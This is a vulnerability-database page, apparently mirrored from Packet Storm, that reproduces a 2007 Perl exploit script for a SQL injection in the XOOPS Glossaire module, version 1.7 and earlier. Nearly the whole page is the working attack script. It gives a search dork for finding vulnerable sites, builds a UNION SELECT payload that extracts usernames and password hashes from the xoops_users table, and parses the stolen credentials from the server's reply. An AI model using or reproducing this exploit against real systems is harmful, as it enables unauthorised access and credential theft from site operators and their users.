Lucene search

K

xoops17-sql.txt

🗓️ 17 May 2007 00:00:00Reported by ajannType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

XOOPS Module Glossarie <= 1.7 Remote BLIND SQL Injection Vulnerabilit

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
#[Script Name: XOOPS Module Glossarie <= 1.7 (sid) Remote BLIND SQL Injection Exploit  
#[Coded by : ajann  
#[Author : ajann  
#[Contact : :(  
#[Dork : "inurl:/modules/glossaire/"  
#[S.Page : http://www.xoops.org/modules/repository/singlefile.php?cid=100&lid=1156  
#[$$ : Free  
#[.. : ajann,Turkey  
  
  
use IO::Socket;  
if(@ARGV < 1){  
print "  
[========================================================================  
[// XOOPS Module Glossarie <= 1.7 (sid) Remote BLIND SQL Injection Exploit  
[// Usage: exploit.pl [target]  
[// Example: exploit.pl victim.com  
[// Example: exploit.pl victim.com  
[// Vuln&Exp : ajann  
[========================================================================  
";  
exit();  
}  
#Local variables  
$kapan = "/*";  
$server = $ARGV[0];  
$server =~ s/(http:\/\/)//eg;  
$host = "http://".$server;  
$port = "80";  
$file = "/modules/glossaire/glossaire-p-f.php?op=ImprDef&sid=";  
  
print "Script <DIR> : ";  
$dir = <STDIN>;  
chop ($dir);  
  
if ($dir =~ /exit/){  
print "-- Exploit Failed[You Are Exited] \n";  
exit();  
}  
  
if ($dir =~ /\//){}  
else {  
print "-- Exploit Failed[No DIR] \n";  
exit();  
}  
  
print "User ID (uid): ";  
$id = <STDIN>;  
chop ($id);  
  
$target = "999999%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),2,3%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;  
$target = $host.$dir.$file.$target;  
  
#Writing data to socket  
print "+**********************************************************************+\n";  
print "+ Trying to connect: $server\n";  
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";  
print $socket "GET $target HTTP/1.1\n";  
print $socket "Host: $server\n";  
print $socket "Accept: */*\n";  
print $socket "Connection: close\n\n";  
print "+ Connected!...\n";  
#Getting  
while($answer = <$socket>) {  
if ($answer =~ /username:(.*?)pass/){  
print "+ Exploit succeed! Getting admin information.\n";  
print "+ ---------------- +\n";  
print "+ Username: $1\n";  
}  
  
if ($answer =~ /password:(.*?)<P>/){  
print "+ Password: $1\n";  
}  
  
if ($answer =~ /Syntax error/) {   
print "+ Exploit Failed : ( \n";  
print "+**********************************************************************+\n";  
exit();   
}  
  
if ($answer =~ /Internal Server Error/) {  
print "+ Exploit Failed : ( \n";  
print "+**********************************************************************+\n";  
exit();   
}  
}  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
29
.json
Report